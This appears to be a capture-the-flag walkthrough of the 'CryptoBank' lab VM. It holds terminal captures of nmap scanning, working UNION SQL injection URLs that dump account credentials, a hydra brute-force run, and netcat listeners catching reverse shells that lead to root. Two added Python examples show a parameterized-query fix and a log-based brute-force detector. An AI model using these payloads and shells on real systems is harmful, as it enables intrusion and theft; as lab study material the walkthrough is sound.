PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 7f:4e:59:df:b7:55:49:cf:d3:12:2d:19:01:05:43:f7 (RSA)
|   256 5e:1b:37:98:ab:c7:e6:ee:5f:f8:df:43:14:de:28:4e (ECDSA)
|_  256 8e:a9:90:9f:6e:51:b1:c7:26:ea:07:ac:69:28:b3:1c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: CryptoBank
MAC Address: 08:00:27:1D:F7:35 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS
// database name
http://cryptobank.local/trade/view_loans.php?search=" union select 1,database(),3--#
// result: cryptobank

// all database names
http://cryptobank.local/trade/view_loans.php?search=" union select 1,group_concat(schema_name),3 from information_schema.schemata--#
// result: information_schema,cryptobank,mysql,performance_schema,sys

// table names in the cryptobank database
http://cryptobank.local/trade/view_loans.php?search=" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='cryptobank'--#
// result: accounts,comments,loans

// column names in the accounts table
http://cryptobank.local/trade/view_loans.php?search=" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='cryptobank'--#
// result: id_account,username,password,balance,USER,HOST,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

// table contents
http://cryptobank.local/trade/view_loans.php?search=" union select 1,group_concat(id_account,'--',username,'--',password,'--',balance),3 from accounts--#
// result: 1--williamdelisle--gFG7pqE5cn--87536,2--juliusthedeveloper--wJWm4CgV26--34421,3--bill.w--3Nrc2FYJMe--26321,4--johndl33t--NqRF4W85yf--1375,5--mrbitcoin--LxZjkK87nu--434455,6--spongebob--3mwZd896Me--8531,7--dreadpirateroberts--7HwAEChFP9--733456,8--deadbeef--6X7DnLF5pG--4324,9--buzzlightyear--LnBHvEhmw3--2886,10--tim--zm2gBcaxd3--857,11--patric--x8CRvHqgPp--1,12--notanirsagent--8hPx2Zqn4b--777
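The enumeration above works because the search term is concatenated straight into the SQL text of a three-column query. As an added example (not the CryptoBank application's code), this Python/SQLite model of view_loans.php shows the concatenated query accepting a UNION payload of the same shape as the page's last one, while the parameterized version treats the same input as a plain search string. The table names mirror the ones enumerated; the rows, the function names and the single-quote string delimiter are constructed for this example.

```python
import sqlite3

# Constructed toy schema mirroring the table names the enumeration above
# returned (accounts, loans); the rows are made up for this example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE accounts(id_account INTEGER, username TEXT, password TEXT, balance INTEGER);
        INSERT INTO accounts VALUES (1, 'alice', 's3cret', 100), (2, 'bob', 'hunter2', 200);
        CREATE TABLE loans(id_loan INTEGER, borrower TEXT, amount INTEGER);
        INSERT INTO loans VALUES (1, 'alice', 5000), (2, 'bob', 300);
    """)
    return db

def view_loans_vulnerable(db, search):
    # The search term is pasted into the SQL text, so a quote closes the
    # string literal and the rest of the input becomes SQL. Three selected
    # columns is why the page's payloads use the shape "1,<expr>,3".
    sql = f"SELECT id_loan, borrower, amount FROM loans WHERE borrower LIKE '%{search}%'"
    return db.execute(sql).fetchall()

def view_loans_fixed(db, search):
    # Bound parameter: the whole input is one string value, never SQL.
    sql = "SELECT id_loan, borrower, amount FROM loans WHERE borrower LIKE ?"
    return db.execute(sql, (f"%{search}%",)).fetchall()

# Same shape as the page's final payload; this toy delimits strings with a
# single quote where the CryptoBank app used a double quote, and SQLite's
# comment marker is "--" with no trailing "#".
PAYLOAD = "' union select 1,group_concat(username||'--'||password),3 from accounts--"

def leaked_credentials(rows):
    """Return the injected group_concat cell(s), if any row carries one."""
    return [r[1] for r in rows if isinstance(r[1], str) and "--" in r[1]]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", leaked_credentials(view_loans_vulnerable(db, PAYLOAD)))
    print("fixed:     ", view_loans_fixed(db, PAYLOAD))
```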
┌──(kali㉿kali)-[~/Documents/CryptoBank_1]
└─$ hydra -L usernames -P passwords 192.168.1.104 http-get /development
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-10-18 02:16:02
[DATA] max 16 tasks per 1 server, overall 16 tasks, 216 login tries (l:18/p:12), ~14 tries per task
[DATA] attacking http-get://192.168.1.104:80/development
[80][http-get] host: 192.168.1.104   login: julius.b   password: wJWm4CgV26
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-10-18 02:16:04
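The run above fires 216 login attempts at /development in about two seconds, which is the signature a defender can look for in the web server's access log. As an added example (not from the page), this Python detector groups 401 responses by source and path, flags a burst above a threshold inside a time window, and records whether a 200 followed it; the log lines are constructed in the shape Apache's combined format would record for such a run, and the threshold and window values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-format lines (not from the page), in the shape
# the hydra run above would leave behind: a burst of 401s on /development
# from one source, then a 200 once a valid login is found.
SAMPLE_LOG = """\
192.168.1.101 - - [18/Oct/2023:02:16:02 -0400] "GET /development HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"
192.168.1.101 - - [18/Oct/2023:02:16:02 -0400] "GET /development HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"
192.168.1.101 - - [18/Oct/2023:02:16:03 -0400] "GET /development HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"
192.168.1.101 - - [18/Oct/2023:02:16:03 -0400] "GET /development HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"
192.168.1.101 - julius.b [18/Oct/2023:02:16:04 -0400] "GET /development HTTP/1.1" 200 1024 "-" "Mozilla/4.0 (Hydra)"
192.168.1.50 - - [18/Oct/2023:02:20:00 -0400] "GET /development HTTP/1.1" 401 459 "-" "curl/7.88.1"
"""

LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse(line):
    """Return (ip, user, time, path, status) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, user, ts, _method, path, status = m.groups()
    return ip, user, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), path, int(status)

def find_bruteforce(lines, threshold=3, window_s=60):
    """Map (ip, path) -> (total 401s, success_after) for every source that
    produced at least `threshold` 401s on one path within `window_s` seconds."""
    events = defaultdict(list)  # (ip, path) -> [(time, status), ...]
    for line in lines:
        rec = parse(line)
        if rec:
            ip, _user, when, path, status = rec
            events[(ip, path)].append((when, status))
    alerts = {}
    for key, evs in events.items():
        evs.sort()
        fails = [t for t, s in evs if s == 401]
        # sliding window over failure timestamps: any `threshold` consecutive
        # failures inside `window_s` seconds counts as a burst
        for i in range(len(fails) - threshold + 1):
            if (fails[i + threshold - 1] - fails[i]).total_seconds() <= window_s:
                success = any(s == 200 and t >= fails[-1] for t, s in evs)
                alerts[key] = (len(fails), success)
                break
    return alerts

if __name__ == "__main__":
    for (ip, path), (n, hit) in find_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{ip} {path}: {n} failed logins, success afterwards: {hit}")
```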
┌──(kali㉿kali)-[~/Documents/CryptoBank_1]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 43320
bash: cannot set terminal process group (1115): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cryptobank:/var/www/cryptobank/development/tools/CommandExecution$ whoami
<yptobank/development/tools/CommandExecution$ whoami
www-data
www-data@cryptobank:/var/www/cryptobank/development/tools/CommandExecution$ id
<w/cryptobank/development/tools/CommandExecution$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cryptobank:/var/www/cryptobank/development/tools/CommandExecution$ uname -a
<tobank/development/tools/CommandExecution$ uname -a
Linux cryptobank 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
www-data@cryptobank:/var/www/cryptobank/development/tools/CommandExecution$ ip a
<cryptobank/development/tools/CommandExecution$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:1d:f7:35 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.104/24 brd 192.168.1.255 scope global dynamic enp0s3
       valid_lft 463sec preferred_lft 463sec
    inet6 fe80::a00:27ff:fe1d:f735/64 scope link
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:c0:de:21:af brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:c0ff:fede:21af/64 scope link
       valid_lft forever preferred_lft forever
5: veth0fe9052@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
    link/ether 52:5e:7e:9b:b6:d8 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::505e:7eff:fe9b:b6d8/64 scope link
       valid_lft forever preferred_lft forever
┌──(kali㉿kali)-[~/Documents/CryptoBank_1]
└─$ sudo nc -lvnp 444
[sudo] password for kali:
listening on [any] 444 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 47398
whoami
solr
id
uid=8983(solr) gid=8983(solr) groups=8983(solr),27(sudo)
which python
/usr/bin/python
python -c "import pty;pty.spawn('/bin/bash')"
solr@33fa86e6105f:/opt/solr/server$ sudo -l
sudo -l
Matching Defaults entries for solr on 33fa86e6105f:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User solr may run the following commands on 33fa86e6105f:
    (ALL) NOPASSWD: ALL
    (ALL : ALL) ALL
solr@33fa86e6105f:/opt/solr/server$ sudo su
sudo su
[sudo] password for solr:
Although the user's privileges are fairly obvious, running sudo su still asks for a password, which I don't quite understand.
flag
Tried the weak passwords root and solr, and kept looking for the flag inside the container.
solr@33fa86e6105f:/opt/solr/server$ sudo su
sudo su
[sudo] password for solr: solr

root@33fa86e6105f:/opt/solr-8.1.1/server# cd /root
cd /root
root@33fa86e6105f:~# ls
ls
flag.txt
root@33fa86e6105f:~# cat flag.txt
cat flag.txt
Good job here our secure cold wallet
flag{s4t0sh1n4k4m0t0}